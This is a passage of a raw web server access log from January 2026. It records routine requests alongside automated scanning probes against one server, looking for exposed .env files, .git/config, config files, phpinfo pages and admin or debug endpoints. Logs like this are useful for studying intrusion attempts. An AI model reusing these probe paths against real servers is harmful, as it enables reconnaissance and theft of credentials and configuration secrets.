1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:04:33:33 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[27/Jan/2026:04:37:59 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:04:39:48 +0000] 200 - GET http 91.82.215.191 "/" [Client 54.199.172.155] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[27/Jan/2026:04:44:12 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:04:45:29 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:05:05:21 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:05:20:13 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:05:24:45 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 64.62.156.24] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:05:30:41 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:05:31:39 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:05:32:12 +0000] 400 - GET http 91.82.215.191 "/" [Client 20.64.105.236] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" +[27/Jan/2026:05:32:13 +0000] 400 - - http localhost "-" [Client 20.64.105.236] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:05:34:32 +0000] 404 - GET http 91.82.215.191 "/.git/config" [Client 213.209.159.181] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/ Firefox/13.0" "-" +[27/Jan/2026:05:36:48 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[27/Jan/2026:05:37:02 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:05:39:38 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:05:51:29 +0000] 200 - GET http 91.82.215.191 "/" [Client 3.134.148.59] [Length 568] [Gzip 1.86] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[27/Jan/2026:05:53:12 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.134.148.59] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:05:53:15 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:05:53:26 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.134.148.59] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:05:55:08 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.134.148.59] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:05:55:12 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:05:55:24 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.134.148.59] [Length 0] [Gzip -] "-" "-" +[27/Jan/2026:05:56:57 +0000] 404 - GET http 91.82.215.191 "/bin/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:06:02:38 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[27/Jan/2026:06:14:28 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:06:19:52 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:06:23:17 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 85.217.140.5] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:06:30:18 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:06:32:41 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:06:46:08 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[27/Jan/2026:06:46:41 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:06:53:27 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[27/Jan/2026:07:00:57 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:07:04:36 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.75] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:07:11:05 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:07:28:52 +0000] 400 - - http localhost "-" [Client 3.137.73.221] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:07:29:02 +0000] 400 - GET http 91.82.215.191 "/" [Client 3.137.73.221] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[27/Jan/2026:07:29:03 +0000] 400 - GET http 91.82.215.191 "/" [Client 3.137.73.221] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[27/Jan/2026:07:30:09 +0000] 400 - - http localhost "-" [Client 3.137.73.221] [Length 0] [Gzip -] "-" "-" +[27/Jan/2026:07:30:37 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:07:30:50 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:07:40:38 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:07:47:09 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:07:49:17 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:07:51:29 +0000] 200 - GET http 91.82.215.191 "/" [Client 165.154.41.115] [Length 1033] [Gzip -] "curl/7.29.0" "-" +[27/Jan/2026:07:51:30 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 165.154.41.115] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:07:51:30 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 165.154.41.115] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:07:52:17 +0000] 200 - GET http 91.82.215.191 "/" [Client 101.36.108.133] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 8_0; Win64; x64) AppleWebKit/580.37 (KHTML, like Gecko) Chrome/80.0.241 Safari/537.36" "-" +[27/Jan/2026:07:52:18 +0000] 400 - GET http 91.82.215.191 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[27/Jan/2026:07:52:19 +0000] 404 - GET http 91.82.215.191 "/robots.txt" [Client 101.36.108.133] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[27/Jan/2026:07:52:19 +0000] 404 - GET http 91.82.215.191 "/sitemap.xml" [Client 101.36.108.133] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[27/Jan/2026:07:53:47 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[27/Jan/2026:07:57:02 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:08:04:12 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:08:16:37 +0000] 400 - GET http 91.82.215.191 "/js/NewWindow_2_all.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[27/Jan/2026:08:16:42 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" "-" +[27/Jan/2026:08:23:37 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:08:24:39 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 204.76.203.6] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:08:27:21 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:08:28:13 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[27/Jan/2026:08:31:28 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:08:43:56 +0000] 200 - GET http 91.82.215.191 "/" [Client 64.62.197.197] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" "-" +[27/Jan/2026:08:44:48 +0000] 404 - GET http 91.82.215.191 "/webui/" [Client 64.62.197.197] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0" "-" +[27/Jan/2026:08:46:13 +0000] 400 - GET http 91.82.215.191 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[27/Jan/2026:08:46:50 +0000] 404 - GET http 91.82.215.191 "/geoserver/web/" [Client 64.62.197.197] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" "-" +[27/Jan/2026:08:47:12 +0000] 404 - GET http 91.82.215.191 "/admin/config.php" [Client 102.22.20.125] [Length 150] [Gzip -] "xfa1,nvdorz,nvd0rz" "-" +[27/Jan/2026:08:48:10 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:08:54:15 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:08:59:02 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.69] [Length 1033] [Gzip -] "-" "-" +[27/Jan/2026:09:00:41 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 194.35.121.198] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:09:01:08 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[27/Jan/2026:09:04:05 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:09:12:11 +0000] 200 - GET http 91.82.215.191 "/?XDEBUG_SESSION_START=phpstorm" [Client 79.124.40.174] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[27/Jan/2026:09:14:14 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:09:19:13 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:09:23:04 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[27/Jan/2026:09:24:12 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:09:24:22 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:09:30:36 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 3.139.242.79] [Length 568] [Gzip 1.86] "air.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[27/Jan/2026:09:32:13 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 3.151.194.164] [Length 568] [Gzip 1.86] "air.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[27/Jan/2026:09:39:47 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:09:40:37 +0000] 200 - GET http 91.82.215.191 "/" [Client 139.186.178.91] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[27/Jan/2026:09:44:25 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:09:53:21 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[27/Jan/2026:10:07:01 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.69] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:10:12:19 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:10:12:52 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:10:19:46 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:10:27:43 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:10:28:58 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[27/Jan/2026:10:33:08 +0000] 200 - GET http 91.82.215.191 "/" [Client 77.90.185.207] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" +[27/Jan/2026:10:34:18 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.69] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:10:36:41 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:10:37:45 +0000] 404 - GET http 91.82.215.191 "/actuator/gateway/routes" [Client 79.124.40.174] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[27/Jan/2026:10:40:41 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.69] [Length 1033] [Gzip -] "-" "-" +[27/Jan/2026:10:53:52 +0000] 400 - GET http 91.82.215.191 "/" [Client 167.94.138.187] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[27/Jan/2026:10:53:53 +0000] 400 - - http localhost "-" [Client 167.94.138.187] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:10:54:07 +0000] 400 - GET http 91.82.215.191 "/wiki" [Client 167.94.138.187] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[27/Jan/2026:10:54:26 +0000] 404 - GET http 91.82.215.191 "/backup/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:10:57:28 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:11:02:20 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:11:06:31 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:11:08:08 +0000] 404 - GET http 91.82.215.191 "/.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Android 6.0; Mobile; rv:45.0) Gecko/45.0 Firefox/45.0" "-" +[27/Jan/2026:11:08:08 +0000] 404 - GET http 91.82.215.191 "/api/.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.11) Gecko/2009070612 Gentoo Firefox/3.0.11" "-" +[27/Jan/2026:11:08:08 +0000] 404 - GET http 91.82.215.191 "/backend/.env" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36" "-" +[27/Jan/2026:11:08:08 +0000] 404 - GET http 91.82.215.191 "/admin/.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8b5) Gecko/20051008 Fedora/1.5-0.5.0.beta2 Firefox/1.4.1" "-" +[27/Jan/2026:11:08:08 +0000] 404 - GET http 91.82.215.191 "/.env.example" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 4.4.2; VirtualBox Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36" "-" +[27/Jan/2026:11:08:09 +0000] 404 - GET http 91.82.215.191 "/app_dev.php/_profiler/phpinfo" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 5.1.1; SM-G928F Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36 Chrome/33.0.0.0" "-" +[27/Jan/2026:11:08:09 +0000] 200 - GET http 91.82.215.191 "/?phpinfo=-1" [Client 78.153.140.179] [Length 1033] [Gzip -] "Nokia6230/2.0 (04.44) Profile/MIDP-2.0 Configuration/CLDC-1.1" "-" +[27/Jan/2026:11:08:09 +0000] 404 - GET http 91.82.215.191 "/config.yaml" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32" "-" +[27/Jan/2026:11:08:09 +0000] 404 - GET http 91.82.215.191 "/env.example" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36" "-" +[27/Jan/2026:11:08:09 +0000] 404 - GET http 91.82.215.191 "/config.ini" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:17.0) Gecko/20100101 Firefox/17.0" "-" +[27/Jan/2026:11:08:09 +0000] 404 - GET http 91.82.215.191 "/test1.php" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/4.0 (compatible; MSIE 5.0; Linux 2.4.4 i686) Opera 6.11 [en]" "-" +[27/Jan/2026:11:08:09 +0000] 404 - GET http 91.82.215.191 "/admin/infophp.php" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.8.1.9) Gecko/20071102 Firefox/2.0.0.9" "-" +[27/Jan/2026:11:08:09 +0000] 404 - GET http 91.82.215.191 "/settings.inc.php" [Client 78.153.140.179] [Length 150] [Gzip -] "Opera/8.54 (Windows NT 5.0; U; de)" "-" +[27/Jan/2026:11:08:09 +0000] 404 - GET http 91.82.215.191 "/settings.cfg" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MASAJS; rv:11.0) like Gecko" "-" +[27/Jan/2026:11:08:10 +0000] 404 - GET http 91.82.215.191 "/staging2/.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.1.7) Gecko/20091222 SUSE/3.5.7-1.1.1 Firefox/3.5.7" "-" +[27/Jan/2026:11:08:10 +0000] 404 - GET http 91.82.215.191 "/robomongo.json" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like 